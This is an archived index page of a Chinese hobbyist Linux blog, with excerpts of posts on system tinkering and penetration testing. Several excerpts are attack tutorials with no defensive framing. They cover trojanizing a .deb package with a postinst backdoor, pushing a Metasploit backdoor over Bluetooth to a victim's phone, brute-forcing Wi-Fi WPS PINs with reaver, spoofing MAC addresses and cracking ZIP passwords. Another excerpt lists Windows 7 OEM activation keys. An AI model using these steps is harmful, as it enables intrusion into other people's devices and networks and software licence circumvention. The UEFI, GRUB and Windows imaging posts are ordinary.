查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Linux 折腾笔记

 
 
 
 
 
 
 
 

[置顶] 博客说明

2014-1-15 20:40:37 阅读21308 评论23 152014/01 Jan15

简单说明下:

本人工作和电脑扯不着边,所以玩电脑属于业余爱好,当然技术也属于这个档次;开博客也不是正真为了开博客,只是为了记录一些平常玩电脑时有意思的方法,以前这些方法是写在纸质笔记上的,弄丢多次,所以最后决定使用网络日志。

非常欢迎有共同兴趣爱好的朋友转载日志;虽然我写的多数方法来自网络,但记录在这里并公开的全是自己实际操作;如果记录的某个方法完全是安照某一篇文章操作的,在末尾都会注明原文出处;有些方法实在是被转烂了,以至于无法得知原文出处时只能作罢;所以我希望如果有朋友要完全引用(直接Crtl + V)本博日志,请一定注明日志出处。

           如果喜欢寒博内容,为了更方便阅读,可以将 《所有日志》 添加到书签或者订阅本博,实时查看更新,点此订阅:RSS

           个人IRC频道,欢迎有相同兴趣爱好的朋友交流讨论:#xiao106347 @irc.freenode.net

作者  | 2014-1-15 20:40:37 | 阅读(21308) |评论(23) | 阅读全文>>

(转)FF样式脚本:浮动侧边书签栏/历史栏

2014-6-2 22:52:44 阅读1454 评论0 22014/06 June2

/* 浮动侧边书签栏/历史栏 */

#sidebar-box {visibility:collapse!important;position:absolute!important;}

#sidebar-box>browser {-moz-appearance: none !important;

-moz-border-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEgAAAAvCAYAAABAHIylAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAAUlSURBVHja7JtPaBRXHMc/781OdnXNqinVlphK4iJoQWiLGIjgLV6UEBFLEcFzLr0JihdB8OjNkwdBWCkKIejFXIKYQkR6CS2Gsv5rjE0sSN11kzWz814P+ya+vMxGL4Xdzfzgx7x9O4edD9/fmzfz+67QWrNeCCGEO9Vg3MyhG4zRnwAg4r53oAgniRm3AhwdM7bnYmGtAWTBiSBI6yiduWaH5AJR1lE5czoO0ipAFhwbhGeltI4upGZWkA0ltI6h9Tk6ZxWkFUAOnChTVmaAHcBWIAukY8qtWeEAfAAqwDvgDVAFalYqK1cgCa11HBzPQPGBDuBrz/P6BgcH1aFDh6pHjx

作者  | 2014-6-2 22:52:44 | 阅读(1454) |评论(0) | 阅读全文>>

Deb安装包中添加后门程序

2014-1-12 15:12:03 阅读4126 评论2 122014/01 Jan12

这里我们以一个shell反弹后门做演示吧;这个后门程序的制作及使用过程本博以前《Metasploit使用后门渗透Ubuntu12.04》中介绍过,有兴趣可以参考下,在此不再赘述。

下载要添加后门的deb包 (如这里的 nmap-**.deb) :

dpkg -x xx.deb xxx           #把xx.deb解包到xxx文件夹在xxx目录新建DEBIAN(必须大写)文件夹touch control postinst          #在DEBIAN文件夹新建control和postinst文件nano control             #写入软件包的信息,比较重要,如果有错误可能导致无法安装,所以建议直接复制原软件包中       control文件所有内容复制后门程序到解包文件夹下 /usr/bin 目录里

nano postinst          #这个是安装软件是执行的脚本,这个也是我们后门程序运行的关键,内容可参考如下:

#!/bin/sh

sudo

作者  | 2014-1-12 15:12:03 | 阅读(4126) |评论(2) | 阅读全文>>

模块化攻击套件:zarp

2014-1-7 18:45:10 阅读2210 评论0 72014/01 Jan7

Zarp是一个本地网络攻击测试集成工具,可以帮助渗透测试人员很好的进行工作。多种嗅探工具、DoS攻击压力测试工具集成在Zarp中。

github下载:点此查看

用法:点此查看

作者  | 2014-1-7 18:45:10 | 阅读(2210) |评论(0) | 阅读全文>>

信息收集 5:系统指纹识别

2014-1-5 22:53:31 阅读1677 评论1 52014/01 Jan5

wafw00f

wafwf url1 url2 url3

#用来探测WAF(运用层防火墙)的工具,会返回在这个之前有什么运用级防火墙是哪个厂商

xprobe2

xprobe2 url/ip

nmap -O

nmap -O target

作者  | 2014-1-5 22:53:31 | 阅读(1677) |评论(1) | 阅读全文>>

ZIP文件密码破解

2013-12-31 23:09:00 阅读4166 评论5 312013/12 Dec31

FCrackzip

这个软件破解zip文件密码比较出名;用法:

fcrackzip -c a -p aaaaaaaa -u file.zip

-c          #charset,字符集;a代表小写字母;A代表大写字母;1代表数字;!代表常见符号

-p          #定义密码格式

-u          #尝试以解压的方式测试密码;ps:这个比较靠谱

Patator的unzip_pass模块

patator是一个支持多协议的密码破解软件,详见:《支持多协议的Patator》;这里只是使用一个破解zip密码的功能,这个密码破解是可以使用字典的:

patator unzip_pass zipfile=test.zip password=FILE0 0=passfile -x ignore:code!=0

作者  | 2013-12-31 23:09:00 | 阅读(4166) |评论(5) | 阅读全文>>

环境:攻击主机和目标手机在同一局域网下;目标手机开启了蓝牙,但是设置了隐藏

简单原理:得知目标手机开启了蓝牙,通过bluegranger向目标手机发送后门程序,配合msf渗透手机

详细过程:

1.加载蓝牙设备并扫描,未发现蓝牙设备:

hciconfig

hciconfig hci0 up

hcitool scan

手机端设置:

2.使用fang工具扫描隐藏的蓝牙设备,可以设置扫描范围,默认为000000000000>>>ffffffffff;为了快些,这里设置的范围比较小 ,实际就不一定有这么简单了!

fang -r 范围 -s

fang -r b0aa3618e5d8-b0aa3618e5f4 -s

ok,扫到一个myteelphone的设备:

3.使用blueranger工具强制连接蓝牙设备:

blueranger.sh <hciX> <bdaddr>       #这里是: blueranger.sh hci0 b0:aa:36:18:e5:e4

手机端显示:

4.使用msf生成后门并开始监听,然后用系统自带蓝牙软件将后门程序发送至目标手机,此时目标手机会弹出一个接受文件的对话框,假设此人点击接受并运行该程序:

渗透成功!

作者  | 2013-12-9 23:58:25 | 阅读(7880) |评论(1) | 阅读全文>>

无线密码破解3:突破MAC地址过滤

2013-11-14 22:22:20 阅读14327 评论5 142013/11 Nov14

突破mac地址过滤,只要知道一个合法mac地址即可;我们在用软件(例如airodump-ng)抓包的时候,如果有合法的客户端连接,软件一般会显示出来。

此时只要修改我们自己的mac地址为合法mac:

临时修改:

ifconfig wlan0 down        #关闭网卡

ifconfig wlan0 hw ether 00:AA:BB:CC:DD:EE            #然后改地址

ifconfig wlan0 up             #然后启动网卡

也可以用macchanger软件:

ifconfig wlan0 down

macchanger -m 00:AA:BB:CC:DD:EE wlan0         或:

macchanger --mac=00:AA:BB:CC:DD:EE wlan0

ifconfig wlan0 up

然后就可以连接了。

作者  | 2013-11-14 22:22:20 | 阅读(14327) |评论(5) | 阅读全文>>

Wifi密码破解2:利用wps漏洞穷举PIN码破解wifi密码

2013-7-16 23:03:02 阅读136079 评论1 162013/07 July16

得到PIN码,怎么破解路由的密码呢?Linux系统下我们可以使用 Reaver 软件破解出路由的密码;下图是通过路由器的PIN码得到wifi密码的效果图:

已知PIN码是   49312119

破解出密码是   #$%19283746

和暴力破解密码相比,利用wps漏洞穷举pin码破解密码不像暴力破解那样全靠字典和硬件,而且就算wifi主人修改密码,只要不更换pin码,也可以很快再次得到密码,但是必须要路由支持并开启WPS功能;如何得到路由的PIN 码呢?

1.最常用的方法是用reaver软件之类的软件进行穷举PIN码,reaver 命令:

reaver -i mon0 -b mac -S -v -n

reaver命令参数(转):

-i 监听后接口名称-b 目标mac地址-a 自动检测目标AP最佳配置-S 使用最小的DH key(可以提高PJ速度)-vv 显示更多的非严重警告-d  即delay每穷举一次的闲置时间 预设为1秒-t  即timeout每次穷举等待反馈的最长时间-c  指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9  参数防止路由僵死示例:

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)

应因状况调整参数(-c后面都已目标频道为1作为例子)

目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1

作者  | 2013-7-16 23:03:02 | 阅读(136079) |评论(1) | 阅读全文>>

UEFI下安装Windows系统方法

2013-6-7 22:31:21 阅读13984 评论5 72013/06 June7

第一种:

将win8的ISO镜像刻录至光盘,插入光驱并重启,选择UEFI模式启动光盘并安装(需要提前准备好GPT分区表硬盘或在安装过程中使用diskpart处理硬盘);

#怎么提前准备好GPT分区表:可以在安装系统之前进入支持uefi的pe系统,然后用diskgenius软件把磁盘转化成GUID(GPT)格式,然后重启;至于diskpart命令在本文最下面有说明。

第二种:

准备好不小于4G的U盘(FAT32),提取ISO镜像所有内容至U盘,重启进入主板启动菜单选择UEFI模式启动U盘(或选择U盘中bootx64.efi文件启动),开始安装windows!

#前提是Windows系统镜像支持uefi启动,支持直接uefi启动的系统镜像会在不久以后提供,敬请关注!

第三种:

准备好不小于256MB的U盘(FAT32),提取ISO镜像EFI文件夹及和sources文件夹及该文件夹下boot.wim至U盘,提取ISO镜像所有内容至其余硬盘,重启选择UEFI模式启动U盘,shift+f10调出命令行,跳转至存放完整安装内容的硬盘并安装win8,需要GPT。

#其实就是提取系统镜像支持uefi的pe模块,等到进行到分区时调出命令提示符窗口,用命令进入准备好完整Windows系统镜像的目录,运行根目录或sources目录里的stupe安装程序进行安装!

第四种:

在硬盘或U盘分区(FAT32)准备好EFI SHELL文件,提取ISO镜像所有内容至硬盘,重启选择从EFI

作者  | 2013-6-7 22:31:21 | 阅读(13984) |评论(5) | 阅读全文>>

开机时遇到Error 15: file not found错误的解决方法

2013-4-30 0:07:52 阅读26604 评论3 302013/04 Apr30

有三种情况会出现这个错误:

1.是grub.conf文件里面的配置出错,这需要你去自己校对该文件,看是否设置正确;

2.是系统在启动过程时,需要加载vmlinuz和initrd这两个文件,如果因为某种诡异的原因在/boot目录下的这两个文件丢失了,也会报上面的错误,那么就需要创建这两个文件;

3.多系统引导错误(windows下添加linux的启动项,开机出现)

这里先解决第三种情况,前面两种情况以后再说。

windows下添加ubuntu的启动项是这样的:

这时候开机之后选ubuntu,有人是正常启动的,有人出现Error 15: file not found;如果无法启动,出现error15,这时删除刚才添加的neogrub启动,添加ubuntu的grub2引导(和添加12.04的引导一样):

然后下载下面ANG0.zip文件,解压出ANG0,替换c盘根目录下的ANG0即可:

ANG0.zip下载:http://pan.baidu.com/share/link?shareid=448177&uk=1209563959

作者  | 2013-4-30 0:07:52 | 阅读(26604) |评论(3) | 阅读全文>>

Windows_7升级密钥大全

2013-4-18 22:18:16 阅读1167 评论0 182013/04 Apr18

不多说,都懂的!

Acer/Packard Bell/Gateway:

旗舰版: FJGCP-4DFJD-GJY49-VJBQ7-HYRR2

       专业版: YKHFT-KW986-GK4PY-FDWYH-7TP9F

       家高版: VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7

       家基板: MB4HF-2Q8V3-W88WR-K7287-2H4CP

       初级版: RDJXR-3M32B-FJT32-QMPGB-GCFF6

Advent:

家高版: 38JTJ-VBPFW-XFQDR-PJ794-8447M

Alienware:

旗舰版: VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD

Asus:

旗舰版: 2WX6M-X2HKM-86X8X-2QD44-F3FGJ

       旗舰版: 2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G

作者  | 2013-4-18 22:18:16 | 阅读(1167) |评论(0) | 阅读全文>>

Windows系统封装5:把自动应答文件封装进install.wim

2013-4-17 21:45:07 阅读7454 评论0 172013/04 Apr17

创建好的自动应答文件如何使用,这里也有两个方法:1.将文件重命名为“AutoUnattend.xml”,直接拖拽到系统镜像根目录下,保存即可,这种方法有局限性,就和前面把oem包拖拽到sources目录下一样,只有用整个系统镜像安装时(如nt6引导,刻录u盘光盘)才会生效,如果是集成win7&win8的合集映像也无法使用;2.恢复文件原始名称“Untitled.xml”,将其封装到install.wim中,这样就能保证不管用什么方法都能产生自动应答效果。

这里说第二种方法:

1.依旧提取install.wim文件到e盘根目录,然后新建mount空文件夹,复制imagex.exe到e盘根目录,管理员打开cmd:

2.挂载映像:

cd到e盘根目录:

imagex /mountrw e:\install.wim 1 e:\mount              (把install.wim里第一个映像挂载到mount目录)

3.写入自动应答文件:

这个比较简单,打开mount的Windows目录,在Windows目录下新建Panther文件夹,复制Untitled.xml到Panther文件夹下,ok!

4.卸载映像:

imagex /unmount e:\mount /commit

自动应答的install.wim制作成功!

作者  | 2013-4-17 21:45:07 | 阅读(7454) |评论(0) | 阅读全文>>

Windows系统封装4:创建Win7&8自动应答文件

2013-4-15 23:56:07 阅读7698 评论1 152013/04 Apr15

首先下载安装Windows system image manager软件(Windows AIK)和Windows原版系统镜像

下载地址:

提取出镜像里install.wim文件。

然后开始创建Windows自动应答文件:

管理员身份打开Windows system image manager

打开文件,“选择Windows映像”,选择提取出来的install.wim文件,同意并生成编录文件;ok,接下来进入正式创建。

新建应答文件

1.pe设置 :

InputLocale用于设置输入语言;

LayerDriver为键盘的种类,除了日文和韩文,应该为“1”;

SystemLocale用于设置运行非Unicode程序时系统的默认语言;

UILanguage用于设置用户界面的语言;

UILanguageFallback表示当UILanguage选用小地区时,若程序没有该种语言,则跳到UILanguageFallback;

UserLocale指地区选项,包括日期、时间、数字等格式;

UILanguage用于设置安装win7过程中的界面所用的语言;

WillShowUI表示安装之前是否显示对话框,询问用户选择安装界面的语言设置。OnError表示有错误时显示对话框;Never表示任何情况下都不显示;Always表示每次都显示(下同);

简体中文为“zh-CN”,繁体中文为“zh-HK”,英文为“en-US”。

作者  | 2013-4-15 23:56:07 | 阅读(7698) |评论(1) | 阅读全文>>

Windows系统封装2:把win7和win8所有版本打包在一起

2013-4-12 23:35:22 阅读6698 评论5 122013/04 Apr12

把win7和win8所有版本打包在一起,一般需要下载Windows7旗舰版,Windows8标准版和Windows8企业版(x64和x86)(笔者没有下载过win8企业版,不知道win8企业版系统镜像是否包含专业版和标准版镜像,自行判断):其实就是在上一篇里的把几个install.wim文件打包在一起,只不过这篇的一个.wim文件包含几个系统镜像。

1.下载镜像

http://msdn.ez58.net                                    http://msdn.itellyou.cn

2.用压缩软件或虚拟光驱提取各自的镜像sources目录下的install.wim文件夹到d盘根目录,并分别重命名win7为install1.win,win8标准版为install2.wim,企业版install3.wim;因为win7旗舰版包含4个版本,win8标准版包含两个版本,win8企业版包含1个版本(好像是这样,不确定可以用ImageX软件查看)。

作者  | 2013-4-12 23:35:22 | 阅读(6698) |评论(5) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 

海外 南非 处女座

 发消息  写留言

 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018

注册 登录  
 加关注